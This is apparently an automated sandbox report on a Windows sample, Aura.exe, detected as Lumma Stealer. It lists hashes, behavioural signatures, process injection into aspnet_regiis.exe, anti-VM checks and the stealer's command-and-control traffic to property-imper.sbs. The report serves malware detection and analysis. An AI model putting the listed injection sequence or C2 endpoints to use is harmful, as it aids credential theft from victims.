Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aura.exe

Overview

General Information

Sample name:Aura.exe
Analysis ID:1561474
MD5:137e48d526e2a840e07d309edffaca30
SHA1:294d908562372639119ff5fc7e0e4c8b528bd3f7
SHA256:18344d1186a130b07d7f6da7fd4164ae5e03863873df9872bdd4151abef46df3
Tags:exeuser-4k95m
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Aura.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 137E48D526E2A840E07D309EDFFACA30)
    • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 1992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • SIHClient.exe (PID: 1992 cmdline: C:\Windows\System32\sihclient.exe /cv jMwXD3dEvUmoR35eQmr9Ww.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: Aura.exe PID: 2836JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-23T14:17:47.880345+010020283713Unknown Traffic192.168.2.549708104.21.33.116443TCP
    2024-11-23T14:17:50.300714+010020283713Unknown Traffic192.168.2.549710104.21.33.116443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-23T14:17:49.331302+010020546531A Network Trojan was detected192.168.2.549708104.21.33.116443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-23T14:17:49.331302+010020498361A Network Trojan was detected192.168.2.549708104.21.33.116443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Aura.exeReversingLabs: Detection: 36%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
    Source: Aura.exeJoe Sandbox ML: detected
    Source: Aura.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: Aura.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\user\Desktop\Aura.PDB source: Aura.exe, 00000000.00000002.2367346591.000000000077A000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Aura.exe, 00000000.00000002.2367587213.0000000000B41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb, Cg source: Aura.exe, 00000000.00000002.2367587213.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Aura.exe, 00000000.00000002.2367587213.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: WERC939.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: Aura.exe, 00000000.00000002.2367587213.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WERC939.tmp.dmp.6.dr
    Source: Binary string: n0C:\Windows\mscorlib.pdb source: Aura.exe, 00000000.00000002.2367346591.000000000077A000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WERC939.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\mscorlib.pdb@ source: Aura.exe, 00000000.00000002.2367587213.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC4FD2 FindFirstFileExW,0_2_6CDC4FD2
    Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1CE638E1h0_2_00394810
    Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00372D30
    Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx-32907D79h]0_2_0037F9E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]3_2_027C1670
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h]3_2_027C1670
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_027A1660
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]3_2_0279F250
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edx], bl3_2_02789630
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, edx3_2_0278A220
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_027AA6E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_027A06B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, edx3_2_0278A2A5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx-32907D79h]3_2_027AD360
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh3_2_02781F00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx-652DDA2Ah]3_2_02789300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+36h]3_2_027A7C30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_027BD000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax3_2_02787960
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]3_2_02787960
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [ecx]3_2_027985C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1CE638E1h3_2_027C2190

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 104.21.33.116:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.33.116:443
    Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.33.116:443
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
    Source: Aura.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
    Source: Aura.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: Aura.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Aura.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: Aura.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
    Source: Aura.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: Aura.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: Aura.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: Aura.exeString found in binary or memory: http://ocsp.digicert.com0
    Source: Aura.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: Aura.exeString found in binary or memory: http://ocsp.entrust.net02
    Source: Aura.exeString found in binary or memory: http://ocsp.entrust.net03
    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
    Source: Aura.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: Aura.exeString found in binary or memory: http://www.entrust.net/rpa03
    Source: aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
    Source: aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/Qq
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api%
    Source: aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiNlV&
    Source: Aura.exeString found in binary or memory: https://www.entrust.net/rpa0
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027B4F00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_027B4F00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027B4F00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_027B4F00

    System Summary

    barindex
    Source: Aura.exeStatic PE information: section name: $;3F&L
    Source: Aura.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDB87F0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,VirtualAlloc,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtGetContextThread,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,VirtualAlloc,0_2_6CDB87F0
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDB6750 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,GetModuleHandleW,0_2_6CDB6750
    Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP11BB.tmpJump to behavior
    Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP1E79.tmpJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_00372AB00_2_00372AB0
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_003720F00_2_003720F0
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_00372D300_2_00372D30
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_0038FB100_2_0038FB10
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_003871600_2_00387160
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_00373F400_2_00373F40
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_0038CD900_2_0038CD90
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_003873900_2_00387390
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_0038BFF00_2_0038BFF0
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDB15300_2_6CDB1530
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDB87F00_2_6CDB87F0
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDB67500_2_6CDB6750
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDB10000_2_6CDB1000
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDB82900_2_6CDB8290
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC0A100_2_6CDC0A10
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDCAFA10_2_6CDCAFA1
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_0038E0D00_2_0038E0D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027BA7103_2_027BA710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278D3D03_2_0278D3D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278B0D03_2_0278B0D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279FA703_2_0279FA70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027C16703_2_027C1670
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02785E603_2_02785E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A16603_2_027A1660
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02786E503_2_02786E50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279F2503_2_0279F250
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027BAE503_2_027BAE50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A86403_2_027A8640
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027886E03_2_027886E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027AA6E03_2_027AA6E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027B4AE03_2_027B4AE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02789AD03_2_02789AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A06B03_2_027A06B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278E73F3_2_0278E73F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027863203_2_02786320
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027827F03_2_027827F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027C2FF03_2_027C2FF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027B9BD03_2_027B9BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02782B903_2_02782B90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02783F803_2_02783F80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027C27803_2_027C2780
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027994503_2_02799450
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A7C303_2_027A7C30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A04303_2_027A0430
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027BD0003_2_027BD000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A18C03_2_027A18C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027BB4B03_2_027BB4B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027BD4903_2_027BD490
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279A08D3_2_0279A08D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027998823_2_02799882
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A55703_2_027A5570
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027B99703_2_027B9970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027879603_2_02787960
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027989403_2_02798940
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027B4D103_2_027B4D10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278B5F03_2_0278B5F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027849E03_2_027849E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027869C03_2_027869C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027A39B03_2_027A39B0
    Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228
    Source: Aura.exeStatic PE information: invalid certificate
    Source: Aura.exe, 00000000.00000000.2021830455.00000000003E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQuinnAvaKaitlyn.tSyST vs Aura.exe
    Source: Aura.exe, 00000000.00000002.2367587213.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Aura.exe
    Source: Aura.exeBinary or memory string: OriginalFilenameQuinnAvaKaitlyn.tSyST vs Aura.exe
    Source: Aura.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Aura.exeStatic PE information: Section: $;3F&L ZLIB complexity 1.0003169993455496
    Source: classification engineClassification label: mal100.evad.winEXE@6/12@1/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027BA710 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_027BA710
    Source: C:\Users\user\Desktop\Aura.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMutant created: NULL
    Source: C:\Windows\System32\SIHClient.exeMutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4956:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2836
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\be81a78e-517a-4563-a11a-51458097df82Jump to behavior
    Source: Aura.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
    Source: C:\Users\user\Desktop\Aura.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Aura.exeReversingLabs: Detection: 36%
    Source: Aura.exeString found in binary or memory: -addpset
    Source: Aura.exeString found in binary or memory: -addfulltrust
    Source: Aura.exeString found in binary or memory: -addgroup
    Source: Aura.exeString found in binary or memory: -help
    Source: C:\Users\user\Desktop\Aura.exeFile read: C:\Users\user\Desktop\Aura.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
    Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228
    Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv jMwXD3dEvUmoR35eQmr9Ww.0.2
    Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
